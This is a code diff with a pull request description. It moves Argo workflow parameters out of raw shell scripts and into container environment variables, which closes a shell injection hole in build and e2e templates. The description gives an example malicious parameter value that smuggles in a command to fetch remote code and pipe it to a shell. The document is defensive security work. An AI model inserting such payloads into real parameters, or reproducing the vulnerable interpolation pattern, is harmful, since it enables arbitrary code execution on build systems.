             OUTPUT_PATH="/mnt/vol/workload-cr.yaml"
@@ -91,7 +111,7 @@ spec:
               WORKLOAD_FROM_SOURCE="true"
               echo ">> Generating workload CR from workload descriptor"
               podman run --rm --network=none \
-              -v $DESCRIPTOR_PATH:/app:rw -w /app \
+              -v "$DESCRIPTOR_PATH:/app:rw" -w /app \
               ghcr.io/openchoreo/openchoreo-cli@sha256:9d5e9a52205b3a9998a2af18b93aae31c2668d3832c8138f6d6875c4743b7f96 \
                 workload create \
                 --namespace "${NAMESPACE_NAME}" \
@@ -103,7 +123,7 @@ spec:
             else
               echo ">> Generating default workload CR"
               podman run --rm --network=none \
-              -v $DESCRIPTOR_PATH:/app:rw -w /app \
+              -v "$DESCRIPTOR_PATH:/app:rw" -w /app \
               ghcr.io/openchoreo/openchoreo-cli@sha256:9d5e9a52205b3a9998a2af18b93aae31c2668d3832c8138f6d6875c4743b7f96 \
                 workload create \
                 --namespace "${NAMESPACE_NAME}" \
@@ -128,12 +148,6 @@ spec:
             cat /mnt/vol/workload-cr.json
 
             # --- Step 3: Get OAuth token ---
-            OAUTH_URL="{{inputs.parameters.oauth-token-url}}"
-            OAUTH_HOST="{{inputs.parameters.oauth-host-header}}"
-            CLIENT_ID="{{inputs.parameters.oauth-client-id}}"
-            CLIENT_SECRET="{{inputs.parameters.oauth-client-secret}}"
-            OAUTH_SCOPE="{{inputs.parameters.oauth-scope}}"
-
             echo ">> Requesting OAuth token from ${OAUTH_URL}"
             if [ -n "${OAUTH_SCOPE}" ]; then
               TOKEN_RESPONSE=$(curl -s --fail-with-body \
@@ -162,9 +176,6 @@ spec:
             echo ">> Successfully obtained access token"
 
             # --- Step 4: Create or update workload via API server ---
-            API_URL="{{inputs.parameters.api-server-url}}"
-            API_HOST="{{inputs.parameters.api-server-host-header}}"
-
             WORKLOAD_NAME=$(podman run --rm -v /mnt/vol:/data:ro mikefarah/yq:4.45.4 -r '.metadata.name' /data/workload-cr.json)
 
             echo ">> Creating workload via ${API_URL}/api/v1/namespaces/${NAMESPACE_NAME}/workloads"

--- a/test/e2e/k3d/workflow-templates/publish-image-e2e.yaml
+++ b/test/e2e/k3d/workflow-templates/publish-image-e2e.yaml
@@ -35,6 +35,13 @@ spec:
             secretName: '{{workflow.parameters.registry-push-secret}}'
       container:
         image: ghcr.io/openchoreo/podman-runner@sha256:2165f0d5ca5c8286c234388d542f50ede8f38108fc25a57ce141fcdf5cc87b00
+        env:
+          - name: GIT_REVISION
+            value: '{{inputs.parameters.git-revision}}'
+          - name: IMAGE_NAME
+            value: '{{workflow.parameters.image-name}}'
+          - name: IMAGE_TAG
+            value: '{{workflow.parameters.image-tag}}'
         command:
           - sh
           - -c
@@ -42,9 +49,6 @@ spec:
           - |-
             set -e
 
-            GIT_REVISION={{inputs.parameters.git-revision}}
-            IMAGE_NAME={{workflow.parameters.image-name}}
-            IMAGE_TAG={{workflow.parameters.image-tag}}
             SRC_IMAGE="${IMAGE_NAME}:${IMAGE_TAG}-${GIT_REVISION}"
 
             REGISTRY_ENDPOINT="host.k3d.internal:20082"
@@ -73,13 +77,13 @@ spec:
 
             podman load -i /mnt/vol/app-image.tar
 
-            podman tag $SRC_IMAGE $REGISTRY_ENDPOINT/$SRC_IMAGE
+            podman tag "$SRC_IMAGE" "$REGISTRY_ENDPOINT/$SRC_IMAGE"
 
             echo ">> Pushing image to registry"
             if [ -f "$AUTH_FILE" ]; then
-              podman push --tls-verify=false --authfile "$AUTH_FILE" $REGISTRY_ENDPOINT/$SRC_IMAGE
+              podman push --tls-verify=false --authfile "$AUTH_FILE" "$REGISTRY_ENDPOINT/$SRC_IMAGE"
             else
-              podman push --tls-verify=false $REGISTRY_ENDPOINT/$SRC_IMAGE
+              podman push --tls-verify=false "$REGISTRY_ENDPOINT/$SRC_IMAGE"
             fi
 
             echo ">> Image published successfully: $REGISTRY_ENDPOINT/$SRC_IMAGE"


### PR DESCRIPTION
<!--
PR title must follow Conventional Commits format: type(scope): subject
Scope is optional and subject must start with a lowercase letter.

Examples:
  feat(api): add endpoint for listing components
  fix(controller): handle nil pointer in reconciler
  docs: update contributor guide
  chore(deps): bump sigs.k8s.io/controller-runtime

See: docs/contributors/github_workflow.md#pr-title-convention
-->

## Purpose
Argo substitutes {{workflow.parameters.*}} / {{inputs.parameters.*}} directly into the raw shell script text before execution, so a malicious parameter value (e.g. an image name or repo owner like "; curl evil | sh; ") is parsed as shell commands rather than data — an injection vulnerability. The getting-started templates were already fixed in #4193, but the same pattern remained in the build-cache, e2e, and samples/workflows templates.

## Approach
Move every interpolated parameter into a container env: entry and reference it in the script as $VAR, so the value arrives as data instead of instructions.

## Related Issues
> Include any related issues that are resolved by this PR.

## Checklist
- [ ] Tests added or updated (unit, integration, etc.)
- [ ] Samples updated (if applicable)
- [ ] Added `backport/<release-branch>` label if this should be backported (e.g., `backport/release-v1.0`)
<!-- Tick the box below if AI generated code or content in this PR. Simple autocomplete or asking AI to explain code doesn't count. See docs/contributors/AI-POLICY.md -->
- [ ] This PR includes AI-generated code or content

## Remarks
> Add any additional context, known issues, or TODOs related to this PR.
